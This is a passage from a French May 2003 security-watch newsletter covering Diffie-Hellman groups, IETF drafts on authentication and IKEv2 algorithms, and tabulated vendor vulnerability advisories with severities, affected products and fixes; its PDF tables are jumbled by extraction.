effectuant l’opération K= Ab = gabmod(n)
On notera que depuis son invention en 1976, ce schéma a fait ses preuves et est aujourd’hui couramment utilisé par
de nombreux protocoles de transmission sécurisés dont ‘SSH’, ‘SSL’ et ‘IPSec’. Rappelons cependant qu’il n’assure
aucunement l’authentification des correspondants et est de fait sensible aux attaques de type ‘man-in-the-middle’.
La mise en œuvre pratique du schéma ‘DH’ - et plus largement des protocoles supportés par ‘OAKLEY’ et ‘IKE’ –
requiert que l’ensemble des intervenants aient connaissance du couple ‘(n,g)’. Ce couple de paramètres peut
parfaitement être généré localement et diffusé au groupe sous réserve de respecter les contraintes mathématiques
qui pèsent sur le choix de ces valeurs. En pratique et pour des raisons évidentes de mise en œuvre dans le cas
d’équipements de communication, on préférera généralement utiliser des valeurs ‘bien connues’ générées dans les
règles de l’art et ‘pré-encodées’ dans les équipements.
Au-delà de l’intérêt purement opérationnel de cette démarche, la spécification d’une structure de données générique
- dénommée ‘groupe’ - autorise l’adaptation du protocole de mise à la clef aux exigences de sécurité et au contexte
associé en autorisant la sélection du schéma – DH, ECC, …- et de la taille des clefs générées.
Sont ainsi actuellement définis les 8 groupes Diffie-Hellman suivants:
Référence
RFC2409
RFC2409
RFC3526
RFC3526
RFC3526
RFC3526
RFC3526
RFC3526
N° Opération
1 MODN
2 MODN
Taille
768
1024
‘n’
2^ 768 - 2^ 704 - 1 + 2^64 * {[2^ 638 pi] +
2^1024 - 2^ 960 - 1 + 2^64 * {[2^ 894 pi] +
149686}
129093}
‘g’
2
2
1536
2^1536 - 2^1472 - 1 + 2^64 * {[2^1406 pi] +
741804}
2
2048
3072
4096
6144
8192
2^2048
2^3072
2^4096
2^6144
2^8192
+ 124476}
+ 1690314}
+ 240904}
+ 929484}
+ 4743158}
2
2
2
2
2
5 MODN
14
15
16
17
18
MODN
MODN
MODN
MODN
MODN
-
2^1984
2^3008
2^4032
2^6080
2^8128
-
1
1
1
1
1
+
+
+
+
+
2^64
2^64
2^64
2^64
2^64
*
*
*
*
*
{[2^1918
{[2^2942
{[2^3966
{[2^6014
{[2^8062
pi]
pi]
pi]
pi]
pi]
Aux deux groupes définis dans le RFC d’origine viennent s’ajouter 6 nouveaux groupes permettant d’anticiper le
problème de l’augmentation régulière de la taille des clefs de session. En effet, la taille maximale de la clef partagée
– et donc la ‘robustesse’ du chiffrement - sera principalement déterminée par la taille du paramètre ‘n’ intervenant
dans l’opération modulaire.
Ces nouveaux groupes seront très certainement rapidement intégrés par les éditeurs et équipementiers dans leurs
prochaines versions de logiciels et de ‘firmwares’, le groupe 5 étant encodé depuis quelques temps déjà dans de
nombreux équipements de télécommunication et logiciels assurant la création de ‘VPN’.
ftp://ftp.isi.edu/in-notes/rfc3526.txt
http://www.ietf.org/rfc/rfc2412.txt
Page 28/65
Mai 2003
LES DRAFTS
DRAFT-IAB-AUTH-MECH-00
A Survey of Authentication Mechanisms
En juillet 2002, E.Rescorla consultant de la société ‘RTFM Inc.’ et auteur de l’ouvrage ‘SSL and TLS: Designing
and Building Secure Systems’ nous proposait un excellent état de l’art en matière de techniques d’authentification
sous la référence ‘draft-rescorla-auth-mech-00.txt’ (Rapport N°48 – Juillet 2002). Une mise à jour de cet état de
l’art vient d’être publiée mais, cette fois-ci, au sein du groupe de travail ‘IAB’ (Internet Advisory Board).
Bien qu’encore incomplet, ce document de travail aborde de manière très structurée les 7 principaux mécanismes
d’authentification s’appuyant sur la connaissance d’une information ou la possession d’un élément secret. Le cas
particulier des mécanismes basés sur une caractéristique individuelle – authentification dite ‘biométrique’ – n’est
cependant toujours pas traité.
Sont ainsi étudiés les mécanismes suivants :
1. Mots de passe en clair
2. Mots de passe jetables
3. Schémas ‘défi / réponse’
4. Schémas à échange de clefs dit ‘DH’
5. Schémas dit ‘à apport de connaissance nul’
6. Schémas à base de certificats et mots de passe
7. Schémas d’authentification mutuelle à base de clefs publiques
Chaque mécanisme fait l’objet d’un chapitre rappelant le principe de fonctionnement sous-jacent, exposant les
différents risques associés mais aussi – et c’est une nouveauté – les services de l’Internet utilisant ce mécanisme.
Lorsque cela est possible, une étude de cas s’appuyant sur une implémentation connue est proposée.
Le modèle de description suivant est ainsi systématiquement utilisé:
A Le mécanisme
(Description)
A.x
A.y
Un risque
(Description et Contre-mesures)
"
"
A.z
Une étude de cas: Protocole(s) spécifique(s) (Description du protocole)
A.z.x
Les problèmes spécifiques à ce(s) protocole(s)
A.w
Une liste des protocoles/systèmes utilisant ce mécanisme
La table des matières de cet état de l’art est présentée ci-dessous, les différences entres les deux versions étant
mises en évidence en caractères soulignés:
1
Introduction
2
The Authentication Problem
2.1 Authorization vs. Authentication
2.2 Something you have, something you know
3
Description of Authentication Mechanisms
4
Passwords In The Clear
4.1 Password Sniffing
4.2 Post-Authentication Hijacking
4.3 Online Password Guessing
4.4 Offline Dictionary Attack
4.5 Case Study: HTTP Basic Authentication
4.6 List of Systems that Use Passwords in the Clear
5
One Time Passwords
5.1 Case Study: S/Key and OTP
5.2 Case Study: SecureID
5.3 List of One-Time Password Systems
6
Challenge/Response
6.1 Offline Attacks on Challenge/Response
6.2 Password File Compromise
6.3 Case Study: CRAM-MD5
6.4 Case Study: HTTP Digest
6.5 Case Study: SSL Session Resumption
6.5 List of Challenge-Response Systems
Anonymous Key Exchange
7.1 Case Study: SSH Password Authentication
7.2 Case Study: TLS Anonymous DH + Passwords
7.3 List of Anonymous Key Exchange Mechanisms
7
8
Zero-Knowledge Password Proofs
8.1 Intellectual Property
8.2 List of Zero Knowledge Password Proof Systems
9
Server Certificates plus Client Authentication
9.1 Case Study: Passwords over HTTPS
9.2 List of Server Certificate Systems
10
Mutual Public Key Authentication
10.1 Password Equivalence
10.2 Authentication between Unknown Parties
10.3 Key Storage
10.4 Tokens
10.5 Password Derived Keys
10.6 Case Study: SMTP over TLS
10.7 List of Mutual Public Key Systems
11
Generic Authentication Mechanisms
11.1 Downgrade Attacks
11.2 Integration with Applications
11.3 Multiple Equivalent Mechanisms
11.4 Excessive Layering
11.5 List of Generic Authentication Systems
12
Sharing Authentication Information
12.1
Authentication Services
12.2
Single Sign-On
12.3. Case Study: RADIUS
12.4. Case Study: Kerberos
12.5. List of Authentication Server Systems
13
Guidance for Protocol Designers
13.1
Know what you're trying to do
13.2
Use As Few Mechanisms as You Can
13.3
Avoid simple passwords
13.4
Avoid inventing something new
13.5
Use the strongest mechanisms you can
13.6
Consider providing message integrity
14
Scenarios
14.1
Capability Considerations
14.2
Architectural Considerations
Si les paragraphes ‘§5.2’ et ‘§6.5’ ont été complétés par rapport à la version précédente, les paragraphes ‘§2.2’,
‘§7.2’, ‘§10.6’, ‘§11.2’, ‘§12.3’ ne sont toujours pas écrits.
Bien que n’étant pas d’accord avec la classification employée laquelle fait apparaître une certaine confusion entre
Page 29/65
Mai 2003
mécanismes et schémas, protocoles et implémentations, nous pouvons que saluer le remarquable travail de synthèse
réalisé par l’auteur et confirmer l’importance des règles de conception simples et efficaces exprimées dans le chapitre
13.
ftp://ftp.nordu.net/internet-drafts/draft-iab-auth-mech-00.txt
DRAFT-IETF-IPSEC-IKEV2-ALGORITHMS-00
Cryptographic Algorithms for use in the Internet Key Exchange Version 2
Le standard RFC2409 (‘IKE - The Internet Key Exchange’) et la proposition de norme (‘IKE V2’) définissent les
mécanismes permettant l’échange des éléments cryptographiques nécessaires à l’établissement d’un canal IPSec
sécurisé entre 2 entités ne partageant aucun secret préalable.
L’existence de multiples implémentations et la généricité des mécanismes proposés conduit l’IETF à imposer un
cadre commun afin de faciliter l’interopérabilité de ces implémentations, notamment vis à vis des travaux de
spécification de la nouvelle version d’IKE.
Le document intitulé ‘Cryptographic Algorithms for use in the Internet Key Exchange Version 2’ décrit ainsi
les options d’implémentation et de configuration devant impérativement être proposées par les produits utilisant ‘IKE
V2’.
Charge : Chiffrement
Obligatoire
AES-128-CBC
Charge : Intégrité
Obligatoire
HMAC-SHA1
Clefs : Groupes DH
Optionnel
Recommandé
Optionnel
Optionnel
Obligatoire
N°1
N°2
N°3
N°4
N°5
768
1024
1024
1024
1024
bits
bits
bits
bits
bits
DH
DH
ECC
ECC
DH
Transport : Chiffrement
Optionnel
Optionnel
Optionnel
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Recommandé
Obligatoire
Optionnel
N°1
N°2
N°3
N°4
N°5
N°6
N°7
N°8
N°9
N°10
N°11
N°12
N°13
ENCR_DES_IV64
ENCR_DES
ENCR_3DES
ENCR_RC5
ENCR_IDEA
ENCR_CAST
ENCR_BLOWFISH
ENCR_3IDEA
ENCR_DES_IV32
ENCR_RC4
ENCR_NULL
ENCR_AES_128_CBC
ENCR_AES_128_CTR
Transport : Génération d’aléa
Optionnel
Obligatoire
Recommandé
Recommandé
N°1
N°2
N°3
N°4
PRF_HMAC_MD5
PRF_HMAC_SHA1
PRF_HMAC_TIGER
PRF_AES128_CBC
Transport : Intégrité
Optionnel
N°1
AUTH_HMAC_MD5_96
Recommandé
N°2
AUTH_HMAC_SHA1_96
Optionnel
N°3
AUTH_DES_MAC
Optionnel
N°4
AUTH_KPDK_MD5
Obligatoire
N°5
AUTH_AES_XCBC_96
ftp://ftp.nordu.net/internet-drafts/draft-ietf-ipsec-ikev2-algorithms-00.txt
Page 30/65
Mai 2003
ALLEER
RT
TE
ES
SE
ET
T AT
TT
TA
AQ
QU
UE
ES
S
ALERTES
GUIDE DE LECTURE
La lecture des avis publiés par les différents organismes de surveillance ou par les constructeurs n’est pas
toujours aisée. En effet, les informations publiées peuvent être non seulement redondantes mais aussi
transmises avec un retard conséquent par certains organismes. Dès lors, deux alternatives de mise en
forme de ces informations peuvent être envisagées :
# Publier une synthèse des avis transmis durant la période de veille, en classant ceux-ci en fonction de
l’origine de l’avis,
# Publier une synthèse des avis transmis en classant ceux-ci en fonction des cibles.
La seconde alternative, pour séduisante quelle soit, ne peut être raisonnablement mise en œuvre étant
donné l’actuelle diversité des systèmes impactés. En conséquence, nous nous proposons de maintenir une
synthèse des avis classée par organisme émetteur de l’avis.
Afin de faciliter la lecture de ceux-ci, nous proposons un guide de lecture sous la forme d’un synoptique
résumant les caractéristiques de chacune des sources d’information ainsi que les relations existant entre
ces sources. Seules les organismes, constructeurs ou éditeurs, disposant d’un service de notification officiel
et publiquement accessible sont représentés.
Avis Spécifiques
Constructeurs
Réseaux
Systèmes
Avis Généraux
Editeurs
Systèmes
Indépendants
Editeurs
Hackers
Editeurs
Organismes
Autres
US
Autres
Aus-CERT
3Com
Compaq
Linux
Microsoft
l0pht
AXENT
BugTraq
CERT
Cisco
HP
FreeBSD
Netscape
rootshell
ISS
@Stake
CIAC
IBM
NetBSD
SGI
OpenBSD
SUN
SCO
Typologies des informations publiées
Publication de techniques et de programmes d’attaques
Détails des alertes, techniques et programmes
Synthèses générales, pointeurs sur les sites spécifiques
Notifications détaillées et correctifs techniques
L’analyse des avis peut être ainsi menée selon les trois stratégies suivantes :
# Recherche d’informations générales et de tendances :
Lecture des avis du CERT et du CIAC
# Maintenance des systèmes :
Lecture des avis constructeurs associés
# Compréhension et anticipation des menaces :
Lecture des avis des groupes indépendants
Aus-CERT
CERT
3Com
Compaq
Microsoft
Cisco
HP
Netscape
BugTraq
rootshell
AXENT
NetBSD
@Stake
l0pht
ISS
OpenBSD
IBM
Xfree86
SGI
Linux
SUN
FreeBSD
CIAC
Page 31/65
Mai 2003
FORMAT DE LA PRESENTATION
Les alertes et informations sont présentées classées par sources puis par niveau de gravité sous la forme
de tableaux récapitulatifs constitués comme suit :
%
Présentation des Alertes
EDITEUR
TITRE
Description sommaire
Informations concernant la plate-forme impactée
Gravité
Date
Produit visé par la vulnérabilité
Description rapide de la source du problème
Correction
URL pointant sur la source la plus pertinente
Référence
%
Présentation des Informations
SOURCE
TITRE
Description sommaire
URL pointant sur la source d’information
SYNTHESE MENSUELLE
Le tableau suivant propose un récapitulatif du nombre d’avis publiés pour la période courante, l’année en
cours et l’année précédente. Ces informations sont mises à jour à la fin de chaque période de veille.
L’attention du lecteur est attirée sur le fait que certains avis sont repris et rediffusés par les différents
organismes. Ces chiffres ne sont donc représentatifs qu’en terme de tendance et d’évolution.
Période du 24/04/2003 au 28/05/2003
Période
14
Organisme
CERT-CA
0
CERT-IN
0
CIAC
14
30
Constructeurs
Cisco
4
HP
8
IBM
1
SGI
4
Sun
13
Editeurs
2
Macromedia
0
Microsoft
2
Netscape
Sco
0
37
Unix libres
Linux RedHat
13
Linux Debian
12
Linux Mandr.
10
FreeBSD
2
1
Autres
@Stake
1
eEye
0
X-Force
0
Cumul
2003 2002
74
165
13
36
0
7
61
122
137
220
9
39
45
99
5
13
22
61
56
8
30
127
4
13
17
72
0
2
9
40
227
349
62
102
95
120
60
85
10
42
16
44
10
9
1
13
5
22
Cumul 2003- Constructeurs
Cisco
7%
Sun
40%
SGI
16%
HP
33%
IBM
4%
Cumul 2003 - Editeurs
Sco
30%
Cumul 2002 - Constructeurs
SGI
28%
Cisco
18%
IBM
6%
HP
44%
Cumul 2002 - Editeurs
Sco
31%
Macromedia
13%
Netscape
0%
Sun
4%
Macromedia
10%
Netscape
2%
Microsoft
57%
Microsoft
57%
Page 32/65
Mai 2003
ALERTES DETAILLEES
AVIS OFFICIELS
Les tables suivantes présentent une synthèse des principales alertes de sécurité émises par un organisme
fiable, par l’éditeur du produit ou par le constructeur de l’équipement. Ces informations peuvent être
considérées comme fiables et authentifiées. En conséquence, les correctifs proposés, s’il y en a, doivent
immédiatement être appliqués.
ADOBE
Vulnérabilité dans Acrobat
Un défaut dans l'implémentation Javascript d'Acrobat provoque l'exécution de code arbitraire par un fichier piégé.
Moyenne 13/05 Adobe Acrobat 5 pour Windows
Ecriture de fichiers dans le répertoire de stockage des plug-ins
Correctif existant Javascript
http://www.adobe.com/support/downloads/detail.jsp?ftpID=2121
Adobe
CERT VU#184820 http://www.kb.cert.org/vuls/id/184820
BEA
Défaut de validation de certificats par WebLogic
WebLogic et Tuxedo effectuent une validation incomplète des certificats qui leur sont présentés.
Forte
12/05 BEA Tuxedo 8.0 et 8.1, WebLogic Entreprise 5.0.1 et 5.1, WebLogic Server et Express 5.1, 6.1, 7.0 et 7.0.0.1
Vérification laxiste
Correctif existant Vérification certificats clients
http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA03-31.jsp
BEA03-31.00
Stockage des mots de passe accessibles dans WebLogic
Plusieurs mots de passe utilisés par WebLogic sont stockés en clair et peuvent être lus par un utilisateur ayant
accès au serveur.
Moyenne 12/05 BEA WebLogic 7.0 et 7.0.0.1
Stockage non sécurisé des mots de passe
Correctif existant WebLogic
http://dev2dev.bea.com/resourcelibrary/advisoriesnotifications/BEA03-30.jsp
BEA03-30.00
CISCO
Déni de service par la fonction 'SAA'
Il est possible de provoquer un déni de service contre les routeurs sur lesquels la fonction 'Service Assurance Agent'
(anciennement 'Response Time Reporter') est activée.
Forte
16/05 Cisco IOS 12.0S, SC, ST, SL, SP, SXCisco IOS 12.1, E, EA, EC, EX, EY, Cisco IOS 12.2, DA, S
Non disponible
Correctif existant Service 'SAA'
http://www.cisco.com/warp/public/707/cisco-sa-20030515-saa.shtml
CSCdx17916
CSCdx61997
Déni de service dans CSS 11000 et 11500
Les commutateurs CSS 11000 et 11500 sont vulnérables à un déni de service.
Forte
01/05 Cisco CSS 11000 et 11500 avec WebNS
Mauvaise réponse à des requêtes DNS
Correctif existant WebNS
http://www.cisco.com/warp/public/707/cisco-sa-20030430-dns.shtml
CSCdz62499
CSCea36989
Mauvaise gestion des requêtes FTP et Telnet via ONS
Une mauvaise gestion des requêtes FTP et Telnet par ONS permet de provoquer une remise à zéro des cartes de
contrôle.
Forte
01/05 Cisco ONS15454 avec ONS 3.0 à 3.4.1Cisco ONS15327 et ONS15454SDH avec ONS 3.3 à 3.4.1Cisco
Palliatif proposé
CSCdz83515
CSCdz83519
ONS15600 avec ONS 1.0
ONS Software
Mauvaise gestion des requêtes FTP et Telnet
http://www.cisco.com/warp/public/707/cisco-sa-20030501-ons.shtml
Multiples vulnérabilités des concentrateurs VPN 3000
Plusieurs vulnérabilités affectent les concentrateurs VPN 3000.
Forte
07/05 Cisco VPN 3000 (modèles 3005, 3015, 3030, 3060, 3080), Cisco VPN 3002 Hardware Client
Concentrateurs VPN 3000
1 - Mauvaise gestion de 'IPSec over TCP'
Palliatif proposé
CSCea77143
CSCdz15393
CSCdt84906
2 - Mauvaise gestion des paquets SSH
3 - Mauvaise gestion des paquets ICMP
http://www.cisco.com/warp/public/707/cisco-sa-20030507-vpn3k.shtml
Page 33/65
Mai 2003
ETHEREAL
Débordements de buffer dans Ethereal
De nouveaux débordements de buffer dans différents dissecteurs d'Ethereal ont été découverts.
Critique 01/05 Ethereal 0.9.11 et précédents
Débordements de buffer
Correctif existant Divers dissecteurs
http://www.ethereal.com/appnotes/enpa-sa-00009.html
enpa-sa-00009
GnuPG
Mauvaise indication de validité de clé
Les clés liées à plusieurs identités indiquent pour toutes les identités un niveau de confiance correspondant à
l'identité dont le niveau de confiance est le plus élevé.
Faible
20/05 GnuPG 1.2.1 et précédents
Mauvaise vérification de la validité de la clé pour une identité
Correctif existant GnuPG
RHSA-03:175-06 https://rhn.redhat.com/errata/RHSA-2003-175.html
http://lists.gnupg.org/pipermail/gnupg-announce/2003q2/000268.html
GnuPG
HP
Vulnérabilité dans 'rexec'
Le programme 'rexec' peut être utilisé pour provoquer l'exécution de code arbitraire.
Forte
29/04 HP-UX 10.20 et 11.00
Exécution de code non sollicité
Correctif existant Programme 'rexec'
http://europe-support2.external.hp.com/atq/bin/doc.pl/
HPSBUX0304-257
Vulnérabilité locale dans 'wall'
Le programme 'wall' contient une vulnérabilité localement exploitable.
Forte
06/05 HP HP-UX 10.20, 11.00 et 11.11
Non disponible
Correctif existant 'wall'
HPSBUX0305-258 http://europe-support2.external.hp.com/atq/bin/doc.pl/?CERTDOCID=HPSBUX0305-258
Vulnérabilité dans 'kermit'
Une vulnérabilité dans 'kermit' permet une augmentation de privilèges.
Forte
18/05 HP HP-UX 10.20 et 11.00
Programme 'kermit'
Débordement de buffer
Palliatif proposé
HPSBUX0305-259 http://europe-support2.external.hp.com/atq/bin/doc.pl/CERTDOCID=HPSBUX0305-259
Vulnérabilité dans 'ipcs'
Le programme 'ipcs' contient un débordement de buffer exploitable par un utilisateur local.
Forte
19/05 HP HP-UX 11.00
Correctif existant Programme 'ipcs'
HPSBUX0305-260 http://europe-support2.external.hp.com/atq/bin/doc.pl/CERTDOCID=HPSBUX0305-260
Vulnérabilité dans 'dupatch' et 'setld'
Une vulnérabilité de type lien symbolique affecte 'dupatch' et 'setld' sur HP Tru64 UNIX.
Forte
01/05 HP Tru64 UNIX 5.1 PK6, 5.1A PK4, 5.1B PK1 et inférieurs, HP Tru64 UNIX 5.0A PK3 et inférieurs,
Palliatif proposé
SSRT3471
HP Tru64 UNIX 4.0F PK7, 4.0G PK3 et inférieurs
'dupatch' et 'setld'
Lien symbolique
http://www.tru64.org/stories.php?story=03/04/28/9781100
HTTP
Vulnérabilité dans la méthode 'TRACE'
La méthode HTTP 'TRACE' permet d'obtenir des informations liées aux requêtes HTTP clientes.
Moyenne 02/05 Sun ONE/iPlanet Web Server 4.1 SP1 à SP12 et 6.0 SP1 à SP5, Apache HTTP Server,
Palliatif proposé
CERT VU#867593
Sun 50603
Microsoft Internet Information Services (IIS)
Méthode HTTP 'TRACE'
Accès aux entêtes HTTP
http://www.kb.cert.org/vuls/id/867593
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/50603
IBM
Vulnérabilité du système d'impression
Les programmes gérant les mécanismes d'AIX contiennent une vulnérabilité exploitable localement.
Forte
13/05 IBM AIX 4.3, 5.1 et 5.2
Vulnérabilité de formatage de chaîne de caractères
Correctif existant Mécanisme d'impression
http://www-1.ibm.com/services/continuity/recover1.nsf/MSS/MSS-OAR-E01-2003.0660.1
E01-2003:0660
Page 34/65
Mai 2003
LINUX DEBIAN
Vulnérabilité dans le paquetage 'leksbot'
Le programme 'leksbot' est incorrectement installé setuid root.
Forte
06/05 Paquetages 'leksbot' inférieurs au 1.2-3.1 ou au 1.2-5
Présence de la permission setuid root
Correctif existant Paquetage 'leksbot'
http://www.debian.org/security/2003/dsa-299
DSA-299-1
Acquisition de privilèges via le paquetage 'fuzz'
Une faille de l'outil 'fuzz' permet d'acquérir les privilèges d'autres utilisateurs.
Moyenne 09/05 Debian Linux 3.0 (woody)
Création non sécurisée de fichiers temporaires
Correctif existant Paquetage 'fuzz'
http://www.debian.org/security/2003/dsa-302
DSA-302-1
Vulnérabilité dans 'lv'
Il est possible de piéger un utilisateur de 'lv' pour qu'il exécute du code choisi par l'attaquant.
Moyenne 15/05 'lv', sur Debian paquetages inférieurs au 4.49. 4-7woody2, 4.49. 3-4potato2 ou au 4.49.5-2
Lecture de fichier de configuration dans le répertoire courant
Correctif existant Utilitaire 'lv'
http://www.securityfocus.com/advisories/5387
DSA-304-1
Vulnérabilité dans les scripts fournis avec Sendmail
Certains scripts inclus par Debian dans le paquetage Sendmail contiennent une vulnérabilité exploitable localement.
Moyenne 15/05 Debian utilisant un paquetage Sendmail inférieurs aux8.12.3-6.4, 8.9.3-26.1 et 8.12.9-2
Création dangereuse de fichiers temporaires
Correctif existant 'expn', 'checksendmail' et
DSA-305-1
'doublebounce.pl'
LINUX REDHAT
Vulnérabilité dans le module Apache 'mod_auth_any'
Le module 'mod_auth_any' fourni par Red Hat contient une faille permettant de provoquer l'exécution de code non
sollicité.
Critique 05/05 Red Hat 7.2 et 7.3
Mauvais échappement des données utilisateurs
Correctif existant Module 'mod_auth_any'
Vulnérabilités diverses dans le noyau
Deux vulnérabilités distinctes ont été découvertes dans le noyau 2.4 de Linux.
Forte
14/05 Noyau 2.4.20 et précédents, Red Hat 7.1 à 9
Erreurs d'implémentation
Correctif existant Noyau système
http://www.ciac.org/ciac/bulletins/n-096.shtml
CIAC N-096
Exécution d'un programme via 'man'
Un programme nommé 'unsafe' peut s'exécuter via 'man'.
Faible
02/05 Red Hat Linux 7.1, 7.2, 7.3 et 8.0'man' inférieur à 1.51
Mauvais traitement d'un fichier
Correctif existant Programme 'man'
MICROSOFT
Deux vulnérabilités dans les serveurs BizTalk
Deux vulnérabilités affectent les serveurs Microsoft BizTalk.
Critique 30/04 Microsoft BizTalk Server 2000 et 2002
1 - Débordement de buffer
Correctif existant 1 - HTTP receiver
MS03-016
2 - DTA
2 - Mauvais filtrage des URLs
http://www.microsoft.com/technet/security/bulletin/MS03-016.asp
Exécution de programmes malicieux via Media Player
Une faille dans Windows Media Player permet l'exécution de programmes malicieux.
Critique 08/05 Microsoft Windows Media Player 7.1, Media Player 8.0 (pour Windows XP)
Non validation des URLs
Correctif existant Téléchargement des 'skins'
MS03-017
http://www.solutions.fi/index.cgi/news_2003_05_07?lang=eng
OnlineSolutions
Page 35/65
Mai 2003
Vulnérabilité dans Internet Explorer
Le téléchargement d'un grand nombre de fichiers est susceptible de conduire Internet Explorer à outrepasser les
demandes de confirmation de l'utilisateur.
Forte
18/05 Microsoft Internet Explorer 6
Internet Explorer
Comportement dangereux en l'absence de ressources suffisantes
Aucun correctif
CERT VU#251788
NESSUS
Exécution de commandes via Nessus
Une faille dans Nessus permet d'exécuter des commandes arbitraires.
Faible
23/05 Nessus 2.0.5 et inférieures
Injection de script
Correctif existant 'libnasl'
http://www.securityfocus.com/archive/1/322316
Deraison
http://lists.netsys.com/pipermail/full-disclosure/2003-May/009799.htmlRenaud
Full Disclosure
ORACLE
Débordement de buffer dans Oracle Net Services
Un débordement de buffer dans le composant Net Services d'Oracle permet l'exécution de code non sollicité.
Forte
28/04 Oracle 7, 8, 8i, 9i R1 et 9i R2 (toutes plates-formes)
Correctif existant Composant Net Services
http://otn.oracle.com/deploy/security/pdf/2003alert54.pdf
Oracle #54
POPTOP
Débordement de buffer dans le serveur PPTP 'Poptop'
Le serveur PPTP 'Poptop' contient un débordement de buffer.
Moyenne 01/05 Poptop Serveur PPTP versions inférieures à 1.1.3-20030409 et 1.1.4-b3
Correctif existant Code source 'ctrlpacket.c'
Bugtraq
QUALCOMM
Usuraption des attachements sur Eudora
Un attachement délivré par Eudora peut être usurpé.
Moyenne 22/05 Qualcomm Eudora 5.2.1
Eudora
Mauvais traitement des attachements
Aucun correctif
http://www.eudora.com/download/eudora/windows/5.2.1/RelNotes.txt
Eudora
http://lists.netsys.com/pipermail/full-disclosure/2003-May/009790.html
Full Disclosure
REALNETWORKS
Débordement de buffer dans RealSystem Server et Proxy
Un débordement de buffer affecte le serveur et le proxy RealSystem de RealNetworks.
Forte
01/05 RealNetworks RealSystem Server 6.x, 7.x et 8.x, RealNetworks RealSystem Proxy 8.x
Correctif existant Serveur et proxy RealSystem
http://www.service.real.com/help/faq/security/bufferoverflow.html
RealNetworks
SCRIPTLOGIC
Multiples vulnérabilités dans le serveur ScriptLogic
De multiples vulnérabilités affectent le serveur ScriptLogic version 4.01.
Forte
30/04 ScriptLogic version 4.01
1 - Mauvais contrôle d'accès
Correctif existant 1 - Partage réseau 'LOGS$'
CERT VU#813737
CERT VU#609137
CERT VU#231705
2 - Requêtes passées avec une configuration arbitraire
2 - Service 'RunAdmin'
3 - Non restriction des requêtes
3 - Service RPC
SGI
Vulnérabilités Apache et PHP dans MediaBase
Le logiciel MediaBase s'appuie sur des versions d'Apache et de PHP qui contiennent plusieurs vulnérabilités.
Forte
19/05 IRIX 6.5 utilisant Kasenna MediaBase
Utilisation de versions vulnérables d'Apache et PHP
Correctif existant Kasenna MediaBase
ftp://patches.sgi.com/support/free/security/advisories/20030502-01-I
20030502-01-I
Page 36/65
Mai 2003
Vulnérabilité dans l'utilisation de LDAP
Lorsqu'un serveur LDAP est utilisé comme base d'utilisateur par le système, l'existence d'un mot de passe n'est pas
vérifiée.
Moyenne 25/04 SGI IRIX 6.5.19 et précédents
Non vérification de la présence d'un mot de passe
Correctif existant Service de nom LDAP
ftp://patches.sgi.com/support/free/security/advisories/20030407-01-P
20030407-01-P
SUN
Exécution de code distant via PHP sur Sun
Une vulnérabilité de PHP SafeMode permet l'exécution de code arbitraire distant via la fonction 'mail()'.
Critique 06/05 Sun 2800 Workgroup NTT/KOBE, Cobalt RaQ 4, Qube 3, RaQ 550, RaQ XTR, Sun Control Station Production,
Correctif existant
ISS 6787
Sun 46724
Sun LX50 (Sun Linux 5.0)
Fonction PHP 'mail()'
Non validation des arguments
http://www.iss.net/security_center/static/6787.php
Déni de service de 'ns-slapd' sur Sun ONE
Sun ONE Directory Server est vulnérable à un déni de service.
Forte
02/05 Sun ONE Directory Server 4.16, 5.0, Directory Server 5.1 sans Service Pack 2, Directory Server 5.1 avec
Correctif existant
Sun 52102
Solaris 9 (Sparc et x86)
Service 'ns-slapd'
Arrêt du service par tout utilisateur non privilégié
Vulnérabilité dans Sun Cluster 2.2
Une vulnérabilité dans Sun Cluster 2.2 permet d'obtenir des informations sensibles.
Forte
20/05 Sun Cluster 2.2 pour Solaris 2.6, 7 et 8 (Sparc)
Noms et mots de passe stockés en clair
Correctif existant Sun Cluster 2.2
Sun 51340
Exposition d'informations sur les serveurs Sun ONE
Les serveurs Sun ONE sont vulnérables à des attaques conduisant à la fuite d'informations.
Moyenne 09/05 Sun ONE/iPlanet Web Server 6.0 SP1 à SP5, Sun ONE Application Server 7.0
Cipher Block Chaining (CBC)
Mauvais traitement des erreurs
Palliatif proposé
Sun 54147
Vulnérabilité dans le mécanisme 'Sun Ray Smartcard'
Il est possible qu'une session soit maintenue bien que le jeton 'Sun Ray' ait été retirée.
Moyenne 28/04 Sun Ray Server Software 1.3 et 2.0
Non disponible
Correctif existant Firmware Sun Ray
Sun 53922
Déni de service contre Solaris 8
Un utilisateur local peut provoquer un déni de service.
Moyenne 28/04 Sun Solaris 8 (Sparc et Intel)
Mauvaise gestion de la mémoire
Correctif existant Commande 'lofiadm'
Sun 54100
Vulnérabilité dans 'java media framework'
Une vulnérabilité dans 'java media framework' (JMF) permet à une applet malicieuse de provoquer l'arrêt de la
machine virtuelle, voire d'exécuter du code avec des privilèges élevés.
Moyenne 14/05 Sun Java Media Framework 2.1.1, à 2.1.1c
Non disponible
Correctif existant Sun Java Media Framework
Sun 54760
Envoi de messages par 'wall' sous une fausse identité
Il est possible d'utiliser 'wall' sous une fausse identité.
Faible
28/04 Sun Solaris 2.6 à 9 (Sparc et Intel)
Non disponible
Correctif existant Commande 'wall'
Sun 51980
Page 37/65
Mai 2003
XINETD
Déni de service dans 'xinetd'
Il est possible de provoquer un déni de service en initiant un grand nombre de connexions qui sont refusées.
Forte
13/05 xinetd 2.3.10 et précédents, Red Hat 7.1 à 9
Non libération des ressources mémoire
Correctif existant 'xinetd'
ALERTES NON CONFIRMEES
Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes
d’information mais n’ont pas encore fait l’objet d’une annonce ou d’un correctif de la part de l’éditeur. Ces
alertes nécessitent la mise en place d’un processus de suivi et d’observation.
3COM
Déni de service contre IP Phone Call manager
Il est possible de provoquer le blocage de IP Phone Call manager.
Forte
25/04 3com NBX IP Phone Call manager, firmware 4.1.21 etprécédents
Correctif existant Serveur FTP embarqué
http://www.secnap.net/security/nbx001.html
Secnap
APPLE
Multiples vulnérabilités des serveurs Darwin
Les serveurs de flux audio et vidéo QuickTime et Darwin sont sensibles à plusieurs vulnérabilités.
Forte
22/05 Apple Darwin Streaming Server (DSS) version 4.1.3, AppleQuickTime Streaming Server
Serveurs Darwin
1 - Débordement d'entier dans le module 'QTSSReflector'
Aucun correctif
Bugtraq
2 - Faille dans le programme 'MP3Broadcaster'
FLOOSIETEK
Débordement de buffer dans FTGate Pro
